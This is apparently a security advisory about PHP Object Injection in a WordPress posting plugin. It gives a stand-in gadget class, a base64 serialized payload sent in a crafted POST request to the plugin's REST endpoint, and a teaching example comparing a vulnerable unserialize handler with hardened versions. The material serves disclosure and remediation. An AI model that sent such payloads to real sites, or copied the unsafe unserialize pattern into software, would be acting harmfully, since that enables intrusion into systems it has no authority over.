The plugin unserializes user input supplied through its settings, which could allow a high-privilege user such as an administrator to perform PHP Object Injection when a suitable gadget chain is present.
To simulate a gadget chain, put the following code in a plugin:
    <?php
    // Stand-in gadget: any class with a magic method that runs on unserialize.
    class Evil {
        // __wakeup() is invoked automatically when an Evil object is unserialized.
        public function __wakeup() : void {
            die("Arbitrary deserialization");
        }
    }
Use the add account function, intercept the request, and add or replace the id or pages parameter with Tzo0OiJFdmlsIjowOnt9Ow== (the base64 encoding of O:4:"Evil":0:{};):
    POST /wp-json/tweet-old-post/v8/api/?req=add_account_fb HTTP/1.1
    Host: <wordpress-site>
    Content-Type: application/json

    {"id":"Tzo0OiJFdmlsIjowOnt9Ow==","pages":["Tzo0OiJFdmlsIjowOnt9Ow=="]}
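The following is an added example, not the plugin's own code, showing why the pattern above is dangerous and what the fix looks like. It keeps the advisory's Evil stand-in gadget and payload, and contrasts a handler that calls unserialize() on the decoded value (the behaviour described above) with two hardened handlers: one that passes allowed_classes => false so PHP never instantiates attacker-chosen classes, and one that validates the id as a plain token instead of accepting serialized PHP at all. The function names unsafeStore, safeStore and validateId, and the id format enforced by the regex, are assumptions for illustration.

```php
<?php
// Added example (not the plugin's code). Evil, the payload and the handler
// names are assumed for illustration; the payload is the one from the advisory.

class Evil {
    public function __wakeup(): void {
        // A real gadget would do harmful work here; we only record that it ran.
        throw new RuntimeException("__wakeup ran: gadget chain reached");
    }
}

// Constructed input: base64 of O:4:"Evil":0:{}; exactly as in the advisory.
$untrusted = 'Tzo0OiJFdmlsIjowOnt9Ow==';

// Vulnerable pattern: decode and unserialize whatever the request carried.
// PHP instantiates Evil and calls __wakeup() before the caller sees the value.
function unsafeStore(string $value): mixed {
    return unserialize(base64_decode($value));
}

// Hardened pattern 1: forbid instantiating any class. PHP returns a
// __PHP_Incomplete_Class placeholder and no magic method runs.
function safeStore(string $value): mixed {
    $decoded = base64_decode($value, true);   // strict mode rejects junk
    if ($decoded === false) {
        return null;
    }
    return unserialize($decoded, ['allowed_classes' => false]);
}

// Hardened pattern 2 (preferred): never accept serialized PHP for an id.
// Accept only a short token of safe characters; anything else is rejected.
// (Assumed format; adjust to the real id shape the plugin expects.)
function validateId(string $value): ?string {
    return preg_match('/^[A-Za-z0-9_-]{1,64}$/', $value) === 1 ? $value : null;
}

try {
    unsafeStore($untrusted);
} catch (RuntimeException $e) {
    echo "vulnerable handler: " . $e->getMessage() . PHP_EOL;
}

$obj = safeStore($untrusted);
echo "hardened handler: " . get_class($obj) . PHP_EOL;   // __PHP_Incomplete_Class

// The base64 payload contains '=' padding, so strict id validation rejects it.
var_dump(validateId($untrusted));   // NULL
```

When the stored value genuinely needs structure (for example a list of page ids), json_encode()/json_decode() gives the same round-trip without the class-instantiation behaviour of unserialize(); allowed_classes => false is the minimal change when serialize() cannot be replaced immediately.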